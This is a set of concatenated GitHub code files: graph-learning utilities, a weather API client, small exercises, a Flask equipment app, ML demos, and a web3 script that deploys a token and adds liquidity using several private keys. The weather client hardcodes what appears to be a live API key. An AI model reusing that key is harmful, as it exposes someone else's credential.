_extract_edge_map(config[\"edge_map\"])\n config_f.seek(0)\n json.dump(config, config_f, indent=4)\n config_f.truncate()\n return config\n\n\ndef _extract_etypes(c_etypes):\n etypes = {}\n for c_etype, eid in c_etypes.items():\n etype = c_etype.split(\":\")[1]\n etypes[etype] = eid\n return etypes\n\n\ndef _extract_edge_map(c_edge_map):\n edge_map = {}\n for c_etype, emap in c_edge_map.items():\n etype = c_etype.split(\":\")[1]\n edge_map[etype] = emap\n return edge_map\n","repo_name":"dmlc/dgl","sub_path":"tests/tools/test_change_etype_to_canonical_etype.py","file_name":"test_change_etype_to_canonical_etype.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"42465812887","text":"import requests\n\n\ndef get_wind_direction(degrees):\n if 350 <= degrees <= 10:\n return 'North'\n elif 10 < degrees < 80:\n return 'North-East'\n elif 80 <= degrees <= 100:\n return 'East'\n elif 100 < degrees < 170:\n return 'South-East'\n elif 170 <= degrees <= 190:\n return 'South'\n elif 190 < degrees < 260:\n return 'South-West'\n elif 260 <= degrees <= 280:\n return 'West'\n elif 280 < degrees < 350:\n return 'North-West'\n\n\ndef get_weather_info(c_name):\n \"\"\"\n get weather information from www.openweathermap.org\n :param c_name: string - name of the city to get the forecast for\n :return: a list of strings comprising the weather forecast.\n \"\"\"\n API_KEY = 'f2c8b1dae6135bc74ca9d95ab020d77a'\n BASE_URL = 'http://api.openweathermap.org/data/2.5/weather'\n\n request_url = f'{BASE_URL}?appid={API_KEY}&q={c_name}'\n response = requests.get(request_url)\n\n if response.status_code == 200:\n data = response.json()\n print(data)\n a = f'Current weather for {c_name}:'\n b = data['weather'][0]['main']\n c = data['weather'][0]['description']\n d = f\"Temperature: {round(data['main']['temp'] - 273.15, 2)} degrees celsius\"\n e = f\"Feels like: {round(data['main']['feels_like'] - 273.15, 2)} degrees celsius\"\n f = f\"Pressure: {data['main']['pressure']} kilopascals\"\n g = f\"Humidity: {data['main']['humidity']} percent\"\n h = f\"Visibility: {data['visibility']} metres\"\n i = f\"Wind speed: 
{data['wind']['speed']} meters per second\"\n j = f\"Wind direction: {get_wind_direction(data['wind']['deg'])}\"\n\n return [a, b, c, d, e, f, g, h, i, j]\n else:\n return f'weather forecast unsuccessful'\n","repo_name":"Ilian-Kossev/virtual-assistant","sub_path":"weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13881041678","text":"'''\nProgram to solve the water jug problem using state space search\n'''\n\nj1 = 0\nj2 = 0\nx = 4\ny = 3\nprint(\"Initial state: (0, 0)\")\nprint(\"Capacities: (4, 3)\")\nprint(\"Goal state: (2, 0 or any number)\")\n\nwhile j1 != 2:\n r = int(input(\"Enter the rule: \"))\n if (r == 1):\n j1 = x\n elif (r == 2):\n j2 = y\n elif (r == 3):\n j1 = 0\n elif (r == 4):\n j2 = 0\n elif (r == 5):\n t = y-j2\n j2 = y\n j1 -= t\n if j1 < 0:\n j1 = 0\n elif (r == 6):\n t = x-j1\n j1 = x\n j2 -= t\n if j2 < 0:\n j2 = 0\n elif (r == 7):\n j2 += j1\n j1 = 0\n if j2 > y:\n j2 = y\n elif (r == 8):\n j1 += j2\n j2 = 0\n if j1 > x:\n j1 = x\n print(j1, j2)\n","repo_name":"sthsuyash/CSIT_Labs","sub_path":"4th_Semester/AI/waterjug.py","file_name":"waterjug.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"17729320585","text":"from ursinanetworking import *\n\nServer = UrsinaNetworkingServer(\"localhost\", 25565)\n\n@Server.event\ndef requestFile(Client, Content):\n print(f\"Ok {Client} ! I will send you the file :D\")\n Client.send_message(\"receiveFile\", ursina_networking_encode_file(\"my_image.png\"))\n\nwhile True:\n Server.process_net_events()","repo_name":"kstzl/UrsinaNetworking","sub_path":"ursinanetworking/examples/send_files/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"54"} +{"seq_id":"45373358442","text":"import time\nfrom web3 import Web3\nfrom solcx import compile_source\nimport json\nimport solcx\nwith open('FKconfig(Ropsten).json') as f:\n configf = json.load(f)\nconfig=configf[\"AVALANCHE\"]\nw3 = Web3(Web3.HTTPProvider(config[\"RPC_URL\"]))\n\nwethaddress = config[\"WETH_ADDRESS\"]\nuniswapaddress = config[\"ROUTER_ADDRESS\"]\nlockaddress = config[\"LOCK_ADDRESS\"]\ndeployer = w3.eth.account.privateKeyToAccount(config[\"DEPLOYER_KEY\"])\nbuyer = w3.eth.account.privateKeyToAccount(config[\"BUYER_KEY\"])\nfreezer = w3.eth.account.privateKeyToAccount(config[\"FREEZER_KEY\"])\nseller = w3.eth.account.privateKeyToAccount(config[\"SELLER_KEY\"])\ndeployernonce = w3.eth.getTransactionCount(deployer.address)\nbuyernonce = w3.eth.getTransactionCount(buyer.address)\nfreezernonce = w3.eth.getTransactionCount(freezer.address)\n\nwith open ('tokenname','r') as file:\n tokenname = file.read()\n\nwith open('uniswapabi', 'r') as file:\n uniswapabi = file.read()\nuniswapinstance =w3.eth.contract(address=uniswapaddress, abi=uniswapabi )\nbuytoken = uniswapinstance.get_function_by_name('swapExactETHForTokens')\n\nsolcx.set_solc_version_pragma(\"pragma solidity 0.6.12;\")\ncompiled_sol = solcx.compile_files(['TestContract.sol', 'address.sol'])\ncontract_interface = compiled_sol.pop(\"TestContract.sol:\"+tokenname)\n\ncontract_ = w3.eth.contract(\n abi=contract_interface['abi'],\n bytecode=contract_interface['bin'])\nabi = contract_.abi\n\nconstruct_txn = contract_.constructor().buildTransaction({\n 'from': 
deployer.address,\n 'nonce': deployernonce,\n 'gas': 4712388,\n 'gasPrice': w3.toWei('5', 'gwei')})\nsigned=deployer.signTransaction(construct_txn)\nc1=w3.eth.sendRawTransaction(signed.rawTransaction)\n\ntime.sleep(60)\ndeployernonce+=1\ntxn_receipt = w3.eth.get_transaction_receipt(c1)\nContractAddress = txn_receipt['contractAddress']\nprint(ContractAddress)\n\ncontract_instance = w3.eth.contract(address=ContractAddress, abi=abi)\naddLiquidity=contract_instance.get_function_by_name(\"addLiquidity\")\n\nunsignaddtx = addLiquidity().buildTransaction({\n 'from': deployer.address,\n 'nonce': deployernonce,\n 'gas': 4712388,\n 'gasPrice': w3.toWei('5', 'gwei'),\n 'value':w3.toWei('0.1','ether')\n})\nsigned=deployer.signTransaction(unsignaddtx)\nc1=w3.eth.sendRawTransaction(signed.rawTransaction)\n\nwith open ('ContractAddress', 'w') as file:\n file.write(ContractAddress)","repo_name":"bryandong24/SolidityAlgo","sub_path":"frontrunkiller(deployer).py","file_name":"frontrunkiller(deployer).py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71561312482","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 19:13:22 2020\n\n@author: atakb\n\"\"\"\n\n# Fonksiyon 3 elemanlı ise bu elemanların bir üçgen belirtip belirtmediği\n# 4 elemanlı ise dörtgeni oluşturduğunu söyleyecek.\n\ndef Geometry(shape):\n if(len(shape) == 3):\n a = shape[0]\n b = shape[1]\n c = shape[2]\n \n if((a+b)>c and (b+c)>a and (a+c)>b): #Üçgen belirtir.\n if(a==b and a==c and b==c):\n print(\"Eşkenar üçgen.\")\n elif((a==b and a==c) or (a==b and b==c) or (a==c and b==c)):\n print(\"İkizkenar üçgen.\")\n else:\n print(\"Çeşitkenar üçgen.\")\n else:\n print(\"Üçgen belirtmiyor!!!\")\n elif(len(shape) == 4):\n a = shape[0]\n b = shape[1]\n c = shape[2]\n d = shape[3]\n if(a==b and b==c and c==d):\n print(\"Kare.\")\n elif(a==c and b==d):\n print(\"Dikdörtgen.\")\n else:\n print(\"Normal dörtgen.\")\n \n \nwhile True:\n value_count = int(input(\"Eleman sayısını giriniz:\"))\n \n if(value_count == 3):\n a = int(input(\"a =\"))\n b = int(input(\"b =\"))\n c = int(input(\"c =\"))\n Geometry([a,b,c])\n elif(value_count == 4):\n a = int(input(\"a =\"))\n b = int(input(\"b =\"))\n c = int(input(\"c =\"))\n d = int(input(\"d =\"))\n Geometry([a,b,c,d]) \n else:\n print(\"Tekrar deneyiniz...\")\n \n \n \n \n \n \n ","repo_name":"BarisATAK/Python_Practise","sub_path":"14_geometry_example.py","file_name":"14_geometry_example.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71587234081","text":"\"\"\" load dataset from ogb \"\"\"\n\nimport argparse\nimport time\n\nfrom ogb.linkproppred import DglLinkPropPredDataset\n\n\ndef load_from_ogbl_with_name(name):\n choices = [\"ogbl-collab\", \"ogbl-ddi\", \"ogbl-ppa\", \"ogbl-citation\"]\n assert name in choices, \"name must be selected from \" + str(choices)\n dataset = DglLinkPropPredDataset(name)\n return dataset[0]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--name\",\n type=str,\n choices=[\"ogbl-collab\", \"ogbl-ddi\", \"ogbl-ppa\", \"ogbl-citation\"],\n default=\"ogbl-collab\",\n help=\"name of datasets by ogb\",\n )\n args = parser.parse_args()\n\n print(\"loading graph... 
it might take some time\")\n name = args.name\n g = load_from_ogbl_with_name(name=name)\n\n try:\n w = g.edata[\"edge_weight\"]\n weighted = True\n except:\n weighted = False\n\n edge_num = g.edges()[0].shape[0]\n src = list(g.edges()[0])\n tgt = list(g.edges()[1])\n if weighted:\n weight = list(g.edata[\"edge_weight\"])\n\n print(\"writing...\")\n start_time = time.time()\n with open(name + \"-net.txt\", \"w\") as f:\n for i in range(edge_num):\n if weighted:\n f.write(\n str(src[i].item())\n + \" \"\n + str(tgt[i].item())\n + \" \"\n + str(weight[i].item())\n + \"\\n\"\n )\n else:\n f.write(\n str(src[i].item()) + \" \" + str(tgt[i].item()) + \" \" + \"1\\n\"\n )\n print(\"writing used time: %d s\" % int(time.time() - start_time))\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/ogb/deepwalk/load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"8091849514","text":"from flask import render_template, url_for, flash, redirect, request, Blueprint\nfrom flask_login import login_required\n\nfrom app.models import (Equipamento, RelatorioEquipamento, TipoEquipamento, \n Solicitacao, admin_required)\nfrom app.forms.equipamentos import (EquipamentoForm, IndisponibilizaEquipamentoForm,\n AtualizaEquipamentoForm, TipoEquipamentoForm,\n RelatorioEquipamentoForm, AtualizaRelatorioEquipamentoForm)\n\nequipamentos = Blueprint('equipamentos', __name__)\n\n\n@equipamentos.route(\"/\")\n@login_required\n@admin_required\ndef equipamento(eqp_id):\n # Recupera as últimas solicitações associadas ao equipamento\n equipamento = Equipamento.recuperar_id(eqp_id)\n solicitacoes = Solicitacao.recuperar_ultimas_eqp(equipamento, 3)\n return render_template('equipamentos/equipamento.html', \n title=equipamento, equipamento=equipamento,\n solicitacoes=solicitacoes)\n\n\n@equipamentos.route(\"/novo\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef novo_equipamento():\n # Preenche a lista de seleção de tipos de equipamento \n # de acordo com o retornado pelo banco de dados\n form = EquipamentoForm()\n tipos_eqp = TipoEquipamento.recuperar_tudo()\n lista_tipos=[(tipo.id, tipo.nome) for tipo in tipos_eqp]\n if lista_tipos:\n form.tipo_eqp.choices = lista_tipos\n else:\n flash('Não há tipos de equipamento cadastrados.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n \n # Valida os dados do formulário enviado e insere um \n # novo registro de equipamento no banco de dados\n if form.validate_on_submit():\n equipamento = Equipamento.criar(form)\n equipamento.inserir()\n flash('O equipamento foi cadastrado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n return render_template('equipamentos/novo_equipamento.html', \n title='Novo Equipamento',\n legend='Novo Equipamento', form=form)\n\n\n@equipamentos.route(\"/novo_tipo\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef novo_tipo_equipamento():\n # Valida os dados do formulário enviado e insere um \n # novo registro de tipo de equipamento no banco de dados\n form = TipoEquipamentoForm()\n if form.validate_on_submit():\n tipo_eqp = TipoEquipamento.criar(form)\n tipo_eqp.inserir()\n flash('O tipo de equipamento foi cadastrado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n return render_template('equipamentos/novo_tipo_equipamento.html', \n title='Novo Tipo de Equipamento', form=form,\n legend='Novo Tipo 
de Equipamento')\n\n\n@equipamentos.route(\"//atualizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef atualiza_equipamento(eqp_id):\n # Valida o formulário enviado e atualiza o registro\n # do equipamento no banco de dados de acordo com ele\n equipamento = Equipamento.recuperar_id(eqp_id)\n form = AtualizaEquipamentoForm()\n if form.validate_on_submit():\n equipamento.atualizar(form)\n flash('O equipamento foi atualizado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n elif request.method == 'GET':\n form.descricao.data = equipamento.descricao\n\n return render_template('equipamentos/atualizar_equipamento.html', \n title='Atualizar Equipamento', form=form,\n legend='Atualizar Equipamento')\n\n\n@equipamentos.route(\"//disponibilizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef disponibiliza_equipamento(eqp_id):\n # Valida os dados do formulário enviado e altera o status\n # do equipamento escolhido para 'Disponível'\n equipamento = Equipamento.recuperar_id(eqp_id)\n if equipamento.verificar_disponibilidade():\n flash('Esse equipamento já está disponível.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n\n # Atualiza os registros do equipamento e do seu tipo\n equipamento.disponibilizar()\n flash('O equipamento foi disponibilizado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n\n@equipamentos.route(\"//indisponibilizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef indisponibiliza_equipamento(eqp_id):\n # Valida os dados do formulário enviado e altera o status\n # do equipamento escolhido para 'Indisponível'\n form = IndisponibilizaEquipamentoForm()\n if form.validate_on_submit():\n equipamento = Equipamento.recuperar_id(eqp_id)\n if not equipamento.verificar_disponibilidade():\n flash('Você não pode tornar este equipamento indisponível.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n\n # Atualiza os registros do equipamento e do seu tipo\n equipamento.indisponibilizar(form)\n flash('O equipamento foi indisponibilizado com sucesso!', 'success') \n return redirect(url_for('principal.inicio', tab=3))\n\n return render_template('equipamentos/indisponibilizar_equipamento.html', \n title='Indisponibilizar Equipamento',\n legend='Indisponibilizar Equipamento', form=form)\n\n\n@equipamentos.route(\"//excluir\", methods=['POST'])\n@login_required\n@admin_required\ndef exclui_equipamento(eqp_id):\n # Impede um equipamento de ser indevidamente excluído\n equipamento = Equipamento.recuperar_id(eqp_id)\n if not equipamento.verificar_disponibilidade():\n if not equipamento.verificar_desabilitado():\n flash('Não é possível excluir uma equipamento\\\n solicitado ou em uso.', 'warning')\n return redirect(url_for('principal.inicio', tab=3))\n\n # Desativa o registro do equipamento\n equipamento.excluir()\n flash('O equipamento foi excluído com sucesso!', 'success')\n return redirect(url_for('principal.inicio', tab=3))\n\n \n@equipamentos.route(\"//relatorios\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef relatorios(eqp_id):\n # Recupera todos os relatórios do equipamento\n equipamento = Equipamento.recuperar_id(eqp_id)\n relatorios = RelatorioEquipamento.recuperar_tudo_eqp(equipamento)\n\n return render_template('equipamentos/relatorios.html', \n title='Relatórios do Equipamento',\n legend='Relatórios do Equipamento',\n relatorios=relatorios, eqp_id=eqp_id)\n\n\n@equipamentos.route(\"//relatorios/novo\", 
methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef novo_relatorio(eqp_id):\n # Valida o formulário e insere o novo relatório no banco de dados\n equipamento = Equipamento.recuperar_id(eqp_id)\n form = RelatorioEquipamentoForm()\n if form.validate_on_submit():\n relatorio = RelatorioEquipamento.criar(equipamento.id, form)\n relatorio.inserir()\n flash('O relatório foi cadastrado com sucesso!', 'success') \n return redirect(url_for('equipamentos.relatorios', eqp_id=eqp_id))\n\n return render_template('equipamentos/novo_relatorio.html', \n title='Novo Relatório', eqp_id=eqp_id,\n legend='Novo Relatório', form=form)\n\n\n@equipamentos.route(\"//relatorios//atualizar\", methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef atualiza_relatorio(eqp_id, relatorio_id):\n # Impede relatórios finalizados de serem atualizados\n relatorio = RelatorioEquipamento.recuperar_id(relatorio_id)\n if not relatorio.verificar_aberto():\n flash('Este relatório já foi finalizado.', 'warning') \n return redirect(url_for('equipamentos.relatorios', eqp_id=eqp_id))\n\n # Valida o formulário e atualiza o relatório no banco de dados\n form = AtualizaRelatorioEquipamentoForm()\n if form.validate_on_submit():\n relatorio.atualizar(form)\n flash('O relatório foi atualizado com sucesso!', 'success') \n return redirect(url_for('equipamentos.relatorios', eqp_id=eqp_id))\n elif request.method == 'GET':\n form.tipo.data = relatorio.tipo_relatorio.value\n form.conteudo.data = relatorio.conteudo\n form.manutencao.data = relatorio.manutencao\n form.defeito.data = relatorio.defeito\n form.detalhes.data = relatorio.detalhes\n form.finalizar.data = False\n\n return render_template('equipamentos/atualizar_relatorio.html', \n title='Atualizar Relatório', eqp_id=eqp_id,\n legend='Atualizar Relatório', form=form)\n ","repo_name":"DWNeo/UniGerencia","sub_path":"app/controllers/equipamentos.py","file_name":"equipamentos.py","file_ext":"py","file_size_in_byte":8877,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24811781235","text":"\"\"\"eval_time.py\n\nAuthor: Victor T. 
N.\n\"\"\"\n\n\nimport numpy as np\nimport os\nfrom human.model.human import HuMAn\nfrom human.utils import dataset\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"1\" # Hide unnecessary TF messages\nimport tensorflow as tf # noqa: E402\n\n\nif __name__ == \"__main__\":\n # Path where the TFRecords are located\n tfr_home = \"../../AMASS/tfrecords\"\n # Load the validation dataset\n parsed_ds = dataset.folder_to_dataset(\n os.path.join(tfr_home, \"valid_1024\"))\n # Load the HuMAn neural network\n model = HuMAn()\n # Load weights from saved model\n saves_path = \"../training/saves/train_universal\"\n model.load_weights(saves_path)\n # Create variables to store mean and stdev for each time frame'\n mean = np.zeros(1024)\n stdev = np.zeros(1024)\n # Create another array, to accumulate the number of data points\n pts = np.zeros(1024)\n # Iterate through a number of horizon frames\n for horizon_frames in range(1, 11):\n # Load the evaluation dataset\n mapped_ds = parsed_ds.map(lambda x: dataset.map_dataset(\n x, skeleton=\"full_body\", horizon_frames=horizon_frames),\n num_parallel_calls=tf.data.AUTOTUNE, deterministic=True)\n eval_ds = mapped_ds.batch(64).prefetch(tf.data.AUTOTUNE)\n # Predict\n print(f\"Predicting with horizon_frames={horizon_frames}\")\n prediction = model.predict(eval_ds, verbose=1)\n # Create the reference dataset\n # All sequences are joined in a single large batch\n reference_ds = (mapped_ds.batch(prediction.shape[0])\n .prefetch(tf.data.AUTOTUNE))\n # Extract the values as NumPy arrays\n inputs, pose_targets = next(reference_ds.as_numpy_iterator())\n # Compute the absolute error between targets and predictions\n abs_err = np.abs(prediction - pose_targets)\n # Extract horizon time from \"inputs\"\n horizon_input = np.round(inputs[\"horizon_input\"][:, 0, 0], 4)\n # Look for invalid predictions\n delete = []\n for n in range(horizon_input.shape[0]):\n # A \"horizon_input\" zeroed out means an impossible shift\n if horizon_input[n] == 0:\n # Mark for deletion\n delete.append(n)\n # Remove the invalid predicitons\n abs_err = np.delete(abs_err, delete, axis=0)\n # Compute the number of data points for a single time step\n step_pts = abs_err.shape[0]*abs_err.shape[2]\n # Compute mean and standard deviation for each time step\n step_mean = np.mean(abs_err, axis=(0, 2))\n step_stdev = np.std(abs_err, axis=(0, 2))\n # Compute new global values\n new_pts = pts + step_pts\n new_mean = (pts*mean + step_pts*step_mean) / new_pts\n new_stdev = np.sqrt((\n pts*stdev**2 + step_pts*step_stdev**2 +\n pts*step_pts*(mean - step_mean)**2 / new_pts) /\n new_pts)\n # Update\n mean = new_mean\n stdev = new_stdev\n pts = new_pts\n # Save values to a NumPy npz file\n np.savez(\"time/time.npz\", mean=mean, stdev=stdev)\n","repo_name":"Vtn21/HuMAn","sub_path":"evaluation/eval_time.py","file_name":"eval_time.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28007358658","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ngaetk2/tools/introspection.py\n\nCreated by Maximillian Dornseif on 2018-04-17.\nMIT licensed.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport inspect\n\n\ndef get_class_that_defined_method(meth):\n \"\"\"Find where a method is comming from.\"\"\"\n try:\n return _get_class_that_defined_method2(meth)\n except AttributeError:\n return _get_class_that_defined_method3(meth)\n except:\n raise\n\n\ndef _get_class_that_defined_method2(meth):\n 
'https://stackoverflow.com/a/961057/49407'\n for cls in inspect.getmro(meth.im_class):\n if meth.__name__ in cls.__dict__:\n return cls\n return None\n\n\ndef _get_class_that_defined_method3(meth):\n 'From https://stackoverflow.com/questions/3589311/get/25959545#25959545'\n if inspect.ismethod(meth):\n for cls in inspect.getmro(meth.__self__.__class__):\n if cls.__dict__.get(meth.__name__) is meth:\n return cls\n meth = meth.__func__ # fallback to __qualname__ parsing\n if inspect.isfunction(meth):\n cls = getattr(inspect.getmodule(meth),\n meth.__qualname__.split('.', 1)[0].rsplit('.', 1)[0])\n if isinstance(cls, type):\n return cls\n return getattr(meth, '__objclass__', None) # handle special descriptor objects\n","repo_name":"mdornseif/appengine-toolkit2","sub_path":"gaetk2/tools/introspection.py","file_name":"introspection.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2510731725","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.datasets import make_classification\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.cross_validation import cross_val_score\r\nfrom sklearn.datasets import make_blobs\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import svm\r\n\r\n\r\ndef categoricalToNumerical(v,dict=None):\r\n if not dict:\r\n dict={}\r\n biggest=len(dict)\r\n res=[]\r\n for i in v:\r\n if not i in dict:\r\n dict[i]=biggest\r\n biggest+=1\r\n res.append(dict[i])\r\n return np.array(res),biggest,dict\r\n\r\n\r\ndef getTrainData(size=None,featureIndices=None):\r\n train = pd.read_csv('../input/train.csv')\r\n train=train.fillna(0)\r\n # train=train.fillna(train.mean())\r\n train=train.values\r\n if size:\r\n train=train[:size,:]\r\n if featureIndices:\r\n indices=featureIndices\r\n else:\r\n indices=list(range(1,train.shape[1]-1))#All indices except ID and except response\r\n # print(indices)\r\n changed=categoricalToNumerical(train[:,2])\r\n dict=changed[2]\r\n print(\"number of categories of column 2 of train:\",changed[1])\r\n train[:,2]=changed[0]\r\n\r\n X, y = train[:,indices] , train[:,-1]\r\n\r\n y=list(map(np.int32,y))\r\n return X,y,dict\r\n\r\n\r\ndef getTestData(dict,size=None,featureIndices=None,):\r\n test = pd.read_csv('../input/test.csv')\r\n test=test.fillna(0)\r\n # train=train.fillna(train.mean())\r\n test=test.values\r\n if size:\r\n test=test[:size,:]\r\n if featureIndices:\r\n indices=featureIndices\r\n else:\r\n indices=list(range(1,test.shape[1]))#All indices except ID and except response\r\n # print(indices)\r\n changed=categoricalToNumerical(test[:,2],dict)\r\n print(\"number of categories of column 2 of train and test:\",changed[1])\r\n test[:,2]=changed[0]\r\n\r\n X= test[:,indices]\r\n ids=test[:,0]\r\n return X,ids\r\n\r\n\r\ndef saveToFile(predictions,ids,filename):\r\n\r\n submission = pd.DataFrame({\r\n \"Id\": ids,\r\n \"Response\": predictions\r\n })\r\n submission.to_csv(filename, index=False)\r\n\r\n\r\n\r\n# importance=[10,9,3,7,40,8,11,16,1,38,37,19,35,33,12,59,34,51,\r\n# 92,28,36,32,77,22]\r\n\r\nsize=None\r\n\r\nTest = pd.read_csv('../input/test.csv')\r\nX,y,dict=getTrainData(size=size)\r\nTest,ids=getTestData(dict,size=size)\r\n\r\nprint(\"Data loaded!\")\r\n# X=X[:,importance]\r\n# 
Test=Test[:,importance]\r\nclf = RandomForestClassifier(max_features=70, n_estimators=500)\r\nclf=clf.fit(X,y)\r\nytest=clf.predict(Test)\r\nprint(ytest.shape)\r\nsaveToFile(ytest,ids,\"testSubmission.csv\")\r\n\r\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/prudential-life-insurance-assessment/Erfan/first-try.py","file_name":"first-try.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"31611738146","text":"import jax.numpy as jnp\nimport jax.random as jr\nfrom jax import vmap\nimport matplotlib.pyplot as plt\n\nfrom dynamax.hidden_markov_model import CategoricalRegressionHMM\n\nif __name__ == \"__main__\":\n key1, key2, key3, key4 = jr.split(jr.PRNGKey(0), 4)\n\n num_states = 2\n num_classes = 3\n feature_dim = 10\n num_timesteps = 20000\n\n hmm = CategoricalRegressionHMM(num_states, num_classes, feature_dim)\n transition_matrix = jnp.array([[0.95, 0.05],\n [0.05, 0.95]])\n true_params, _ = hmm.initialize(key=key1, transition_matrix=transition_matrix)\n\n inputs = jr.normal(key2, (num_timesteps, feature_dim))\n states, emissions = hmm.sample(true_params, key3, num_timesteps, inputs=inputs)\n\n # Try fitting it!\n test_hmm = CategoricalRegressionHMM(num_states, num_classes, feature_dim)\n params, props = test_hmm.initialize(key=key4)\n params, lps = test_hmm.fit_em(params, props, emissions, inputs=inputs, num_iters=100)\n\n # Plot the data and predictions\n # Compute the most likely states\n most_likely_states = test_hmm.most_likely_states(params, emissions, inputs=inputs)\n\n # Predict the emissions given the true states\n As = params[\"emissions\"][\"weights\"][most_likely_states]\n bs = params[\"emissions\"][\"biases\"][most_likely_states]\n predictions = vmap(lambda x, A, b: A @ x + b)(inputs, As, bs)\n predictions = jnp.argmax(predictions, axis=1)\n\n offsets = 3 * jnp.arange(num_classes)\n plt.imshow(most_likely_states[None, :],\n extent=(0, num_timesteps, -3, 3 * num_classes),\n aspect=\"auto\",\n cmap=\"Greys\",\n alpha=0.5)\n plt.plot(emissions)\n plt.plot(predictions, ':k')\n plt.xlim(0, num_timesteps)\n plt.ylim(-0.25, 2.25)\n plt.xlabel(\"time\")\n plt.xlim(0, 100)\n\n plt.figure()\n plt.plot(lps)\n plt.axhline(hmm.marginal_log_prob(true_params, emissions, inputs), color='k', ls=':')\n plt.xlabel(\"EM iteration\")\n plt.ylabel(\"log joint probability\")\n\n plt.figure()\n plt.imshow(jnp.vstack((states[None, :], most_likely_states[None, :])),\n aspect=\"auto\", interpolation='none', cmap=\"Greys\")\n plt.yticks([0.0, 1.0], [\"$z$\", \"$\\hat{z}$\"])\n plt.xlabel(\"time\")\n plt.xlim(0, 500)\n\n\n print(\"true log prob: \", hmm.marginal_log_prob(true_params, emissions, inputs=inputs))\n print(\"test log prob: \", test_hmm.marginal_log_prob(params, emissions, inputs=inputs))\n\n plt.show()","repo_name":"probml/dynamax","sub_path":"dynamax/hidden_markov_model/demos/categorical_glm_hmm_demo.py","file_name":"categorical_glm_hmm_demo.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"54"} +{"seq_id":"2030157912","text":"import json\nimport logging\nimport os\nimport random\nfrom typing import Tuple, Union, Any, Iterable, List\n\nimport numpy\nimport pandas\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom traffic_autoencoder import defaults\nfrom traffic_autoencoder.schemas import (\n Config,\n DataPreprocessing,\n ModelDefinition,\n FitParameters,\n 
ExperimentDefinition,\n)\n\nlogger = logging.getLogger(defaults.logger_name + \".\" + __name__)\n\n\nclass StreamToLogger(object):\n \"\"\"\n Fake file-like stream object that redirects writes to a logger instance.\n \"\"\"\n\n def __init__(self, logger, log_level=logging.INFO):\n self.logger = logger\n self.log_level = log_level\n self.linebuf = \"\"\n\n def write(self, buf):\n for line in buf.rstrip().splitlines():\n self.logger.log(self.log_level, line.rstrip())\n\n\ndef configure_logger(config: Config, verbose: bool) -> logging.Logger:\n \"\"\"\n Reads the logging config and returns a ready logger. This logger name is\n hardcoded and share in all project modules.\n :param config: general script configuration\n :param verbose: whether to give all details on the process execution\n :return: a configured logger instance\n \"\"\"\n\n logger = logging.getLogger(defaults.logger_name)\n logger.setLevel(logging.DEBUG)\n\n # sys.stdout = StreamToLogger(logger)\n # sys.stderr = StreamToLogger(logger, log_level=logging.ERROR)\n\n file_handler = logging.FileHandler(config.logging_path)\n file_level = logging.DEBUG\n file_handler.setLevel(file_level)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n if verbose:\n console_handler = 